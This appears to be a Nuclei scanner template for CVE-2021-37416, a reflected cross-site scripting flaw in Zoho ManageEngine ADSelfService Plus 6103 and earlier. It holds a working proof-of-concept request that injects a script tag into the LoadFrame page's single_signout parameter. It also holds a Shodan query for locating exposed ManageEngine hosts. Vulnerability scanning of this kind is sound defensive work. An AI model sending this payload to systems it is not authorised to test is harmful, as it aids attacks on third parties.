nuclei-templates/cves/2021/CVE-2021-37416.yaml

46 lines
1.2 KiB
YAML

id: CVE-2021-37416
info:
name: Zoho ManageEngine ADSelfService Plus <=6103 - Cross-Site Scripting
author: edoardottt
severity: medium
description: Zoho ManageEngine ADSelfService Plus 6103 and prior contains a reflected cross-site scripting vulnerability on the loadframe page.
reference:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37416
- https://blog.stmcyber.com/vulns/cve-2021-37416/
- https://nvd.nist.gov/vuln/detail/CVE-2021-37416
tags: cve,cve2021,zoho,xss
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2021-37416
cwe-id: CWE-79
metadata:
shodan-query: http.title:"ManageEngine"
verified: true
requests:
- method: GET
path:
- "{{BaseURL}}/LoadFrame?frame_name=x&src=x&single_signout=x%27%3E%3C/iframe%3E%3Cscript%3Ealert(1)%3C/script%3E"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: header
words:
- "text/html"
- type: word
part: body
words:
- "></iframe><script>alert(1)</script>"
- "adsf/js/"
condition: and
# Enhanced by mp on 2022/08/28